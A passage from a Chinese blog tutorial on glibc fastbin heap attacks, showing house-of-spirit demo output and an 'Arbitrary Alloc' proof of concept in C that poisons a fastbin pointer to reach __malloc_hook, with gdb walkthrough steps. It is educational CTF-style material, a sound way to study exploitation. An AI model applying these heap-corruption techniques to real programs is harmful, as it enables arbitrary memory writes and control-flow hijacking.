<pre class=" language-lang-c"><code class="language-lang-c">这个文件展示了house of spirit的攻击。
调用malloc()一次，以便它设置它的内存。
现在，我们将覆盖一个指向假的'fastbin'区域的指针。
这个区域(内存长度:80)包含两个块。第一个开始于0x7ffc9f9feb48，第二个开始于0x7ffc9f9feb88。
．.． 请注意，这必须是下一个malloc请求的大小，四舍五入到malloc实现使用的内部大小。例如，在x64上，0x30-0x38将全部四舍五入到0x40，所以它们将在最后为malloc参数工作。
现在，我们将用第一个假块中的假区域地址0x7ffc9f9feb48重写指针。
．.． 请注意，与这个块相关联的区域的内存地址必须是16字节对齐的。
释放被覆盖的指针。
现在，下一个malloc将返回我们在0x7ffc9f9feb48处的伪块区域，它将是0x7ffc9f9feb50!
malloc(0x30): 0x7ffc9f9feb50
</code></pre>
<p>fake chunk 被写入前</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033036.png" alt="image-20220109202535525"></p>
<p>fake chunk被写入后</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033037.png" alt="image-20220109202652132"></p>
<p>fake chunk 被释放后</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033038.png" alt="image-20220109202816324"></p>
<p>接下来再次 malloc 一个相同大小的 chunk 就会把这块区域的chunk申请过去</p>
<h3 id="Arbitrary-Alloc"><a href="#Arbitrary-Alloc" class="headerlink" title="Arbitrary Alloc"></a>Arbitrary Alloc</h3><h4 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h4><p>要利用Alloc to Stack这个条件，对应的堆的地址必须要有合法的size，这样才能将堆内存分配到栈中，从而控制栈中的任意内存地址。而这个Arbitrary Alloc和Alloc to Stack基本上完全相同，但是控制的内存地址不在仅仅局限于栈，而是任意的内存地址，比如说bss、heap、data、stack等等</p>
<h4 id="例子"><a href="#例子" class="headerlink" title="例子"></a>例子</h4><p>在这个例子，我们使用字节错位来实现直接分配 fastbin 到<strong>_malloc_hook 的位置，相当于覆盖_malloc_hook 来控制程序流程。</strong></p>
<pre class=" language-lang-c"><code class="language-lang-c">int main(void)
&#123;
    void *chunk1;
    void *chunk_a;

    chunk1=malloc(0x60);

    free(chunk1);

    *(long long *)chunk1=0x7ffff7dd1af5-0x8;
    malloc(0x60);
    chunk_a=malloc(0x60);
    return 0;
&#125;
</code></pre>
<blockquote>
<p>使用命令：gcc -g -z execstack -fno-stack-protector arbitrary_alloc.c -o arbitrary_alloc_elf进行编译</p>
</blockquote>
<h5 id="检查一下文件的保护"><a href="#检查一下文件的保护" class="headerlink" title="检查一下文件的保护"></a>检查一下文件的保护</h5><p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024898.png" alt="image-20220111165705420"></p>
<p>开始调试</p>
<h5 id="在第6行下断点"><a href="#在第6行下断点" class="headerlink" title="在第6行下断点"></a>在第6行下断点</h5><p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024900.png" alt="image-20220111174244769"></p>
<p>此时chunk_a指针所指向的地址为0x7fffffffde20</p>
<p>执行chunk1=malloc(0x60)</p>
<h5 id="对程序的第8行下断点，继续运行程序"><a href="#对程序的第8行下断点，继续运行程序" class="headerlink" title="对程序的第8行下断点，继续运行程序"></a>对程序的第8行下断点，继续运行程序</h5><p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024901.png" alt="image-20220111174621558"></p>
<p>可以看到，申请堆地址空间的data地址已经赋值给了chunk1指针</p>
<p>执行free(chunk1);</p>
<h5 id="继续向下调试，对程序的第10行下断点，然后运行"><a href="#继续向下调试，对程序的第10行下断点，然后运行" class="headerlink" title="继续向下调试，对程序的第10行下断点，然后运行"></a>继续向下调试，对程序的第10行下断点，然后运行</h5><p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024902.png" alt="image-20220111174905701"></p>
<p>此时fastbin已经回收堆内存</p>
<p>在说明下一行代码之前，先来说说代码错位这个情况。由于这个程序的本意是控制__malloc_hook，所以我们先找到它的地址，</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024903.png" alt="image-20220111175041523"></p>
<p>要控制__malloc_hook地址，就要先找到合法的size域，在地址0x7ffff7dd1b10开始向前寻找</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024904.png" alt="image-20220111175222558"></p>
<p>由于这个程序是64位的，因此 fastbin 的范围为32字节到128字节(0x20-0x80)，如下</p>
<pre class=" language-lang-c"><code class="language-lang-c">//这里的size指用户区域，因此要小2倍SIZE_SZ
Fastbins[idx=0, size=0x10] 
Fastbins[idx=1, size=0x20] 
Fastbins[idx=2, size=0x30] 
Fastbins[idx=3, size=0x40] 
Fastbins[idx=4, size=0x50] 
Fastbins[idx=5, size=0x60] 
Fastbins[idx=6, size=0x70]
</code></pre>
<p>过观察发现 0x7ffff7dd1af5 处可以现实错位构造出一个0x000000000000007f：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024905.png" alt="image-20220111175428975"></p>
<p>因为 0x7f 在计算 fastbin index 时，是属于 index 5 的，即 chunk 大小为 0x70 的。</p>
<pre class=" language-lang-c"><code class="language-lang-c">##define fastbin_index(sz)                                                      \
    ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
</code></pre>
<blockquote>
<p>sz的大小为unsigned int，因此只占4个字节</p>
</blockquote>
<p>而其大小又包含了 0x10 的 chunk_header，因此我们选择分配 0x60 的 fastbin，将其加入链表。 最后经过两次分配可以观察到 chunk 被分配到 0x7ffff7dd1afd，因此我们就可以直接控制 malloc_hook的内容(在我的libc中realloc_hook与__malloc_hook是在连在一起的)</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024906.png" alt="image-20220111175929314"></p>
<p>执行 <em>(long long </em>)chunk1=0x7ffff7dd1af5-0x8;</p>
<h5 id="对代码的第11行下断点，继续运行程序："><a href="#对代码的第11行下断点，继续运行程序：" class="headerlink" title="对代码的第11行下断点，继续运行程序："></a>对代码的第11行下断点，继续运行程序：</h5><p>0x7ffff7dd1af5-0x8=0x7ffff7dd1aed</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024907.png" alt="image-20220111180050626"></p>
<p>从这个bin可以看出，假如我们进行两次malloc的话：</p>
<ul>
<li><p>第一次malloc使用空间0x602000</p>
</li>
<li><p>第二次malloc使用空间0x0x7ffff7dd1aed</p>
</li>
</ul>
<h5 id="为了验证这个猜想，我们对代码的13行下断点，然后运行程序"><a href="#为了验证这个猜想，我们对代码的13行下断点，然后运行程序" class="headerlink" title="为了验证这个猜想，我们对代码的13行下断点，然后运行程序"></a>为了验证这个猜想，我们对代码的13行下断点，然后运行程序</h5><p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201120024908.png" alt="image-20220111180640290"></p>
<p>可以看到，此时堆内存已经分配到了栈上，并且可以继续向下延伸控制栈空间</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>Arbitrary Alloc 在 CTF 中用地更加频繁。我们可以利用字节错位等方法来绕过 size 域的检验，实现任意地址分配 chunk，最后的效果也就相当于任意地址写任意值。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="http://wysyrg.github.io">chuwei</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://wysyrg.github.io/2022/08/06/fastbin_attack/">http://wysyrg.github.io/2022/08/06/fastbin_attack/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://wysyrg.github.io" target="_blank">chuwei'blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="/img/973119.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/08/06/gdb%E6%8F%92%E4%BB%B6%E9%85%8D%E7%BD%AE/"><img class="prev-cover" src="/img/973119.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">gdb插件配置</div></div></a></div><div class="next-post pull-right"><a href="/2022/08/06/examination/"><img class="next-cover" src="/img/973119.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">examination</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#fastbin-attack"><span class="toc-number">1.</span> <span class="toc-text">fastbin_attack</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D-%C2%B6"><span class="toc-number">1.1.</span> <span class="toc-text">介绍 </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fasbin-dup"><span class="toc-number">1.2.</span> <span class="toc-text">fasbin_dup</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fastbin-dup-into-stack"><span class="toc-number">1.3.</span> <span class="toc-text">fastbin_dup_into_stack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fastbin-dup-consolidate"><span class="toc-number">1.4.</span> <span class="toc-text">fastbin_dup_consolidate</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#house-of-spirit"><span class="toc-number">1.5.</span> <span class="toc-text">house of spirit</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.5.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">1.5.2.</span> <span class="toc-text">利用思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5"><span class="toc-number">1.5.3.</span> <span class="toc-text">检查</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A4%BA%E4%BE%8B"><span class="toc-number">1.5.4.</span> <span class="toc-text">示例</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Arbitrary-Alloc"><span class="toc-number">1.6.</span> <span class="toc-text">Arbitrary Alloc</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.6.1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BE%8B%E5%AD%90"><span class="toc-number">1.6.2.</span> <span class="toc-text">例子</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5%E4%B8%80%E4%B8%8B%E6%96%87%E4%BB%B6%E7%9A%84%E4%BF%9D%E6%8A%A4"><span class="toc-number">1.6.2.1.</span> <span class="toc-text">检查一下文件的保护</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%9C%A8%E7%AC%AC6%E8%A1%8C%E4%B8%8B%E6%96%AD%E7%82%B9"><span class="toc-number">1.6.2.2.</span> <span class="toc-text">在第6行下断点</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AF%B9%E7%A8%8B%E5%BA%8F%E7%9A%84%E7%AC%AC8%E8%A1%8C%E4%B8%8B%E6%96%AD%E7%82%B9%EF%BC%8C%E7%BB%A7%E7%BB%AD%E8%BF%90%E8%A1%8C%E7%A8%8B%E5%BA%8F"><span class="toc-number">1.6.2.3.</span> <span class="toc-text">对程序的第8行下断点，继续运行程序</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%BB%A7%E7%BB%AD%E5%90%91%E4%B8%8B%E8%B0%83%E8%AF%95%EF%BC%8C%E5%AF%B9%E7%A8%8B%E5%BA%8F%E7%9A%84%E7%AC%AC10%E8%A1%8C%E4%B8%8B%E6%96%AD%E7%82%B9%EF%BC%8C%E7%84%B6%E5%90%8E%E8%BF%90%E8%A1%8C"><span class="toc-number">1.6.2.4.</span> <span class="toc-text">继续向下调试，对程序的第10行下断点，然后运行</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AF%B9%E4%BB%A3%E7%A0%81%E7%9A%84%E7%AC%AC11%E8%A1%8C%E4%B8%8B%E6%96%AD%E7%82%B9%EF%BC%8C%E7%BB%A7%E7%BB%AD%E8%BF%90%E8%A1%8C%E7%A8%8B%E5%BA%8F%EF%BC%9A"><span class="toc-number">1.6.2.5.</span> <span class="toc-text">对代码的第11行下断点，继续运行程序：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%B8%BA%E4%BA%86%E9%AA%8C%E8%AF%81%E8%BF%99%E4%B8%AA%E7%8C%9C%E6%83%B3%EF%BC%8C%E6%88%91%E4%BB%AC%E5%AF%B9%E4%BB%A3%E7%A0%81%E7%9A%8413%E8%A1%8C%E4%B8%8B%E6%96%AD%E7%82%B9%EF%BC%8C%E7%84%B6%E5%90%8E%E8%BF%90%E8%A1%8C%E7%A8%8B%E5%BA%8F"><span class="toc-number">1.6.2.6.</span> <span class="toc-text">为了验证这个猜想，我们对代码的13行下断点，然后运行程序</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">1.6.3.</span> <span class="toc-text">总结</span></a></li></ol></li></ol></li></ol></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2022 By chuwei</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>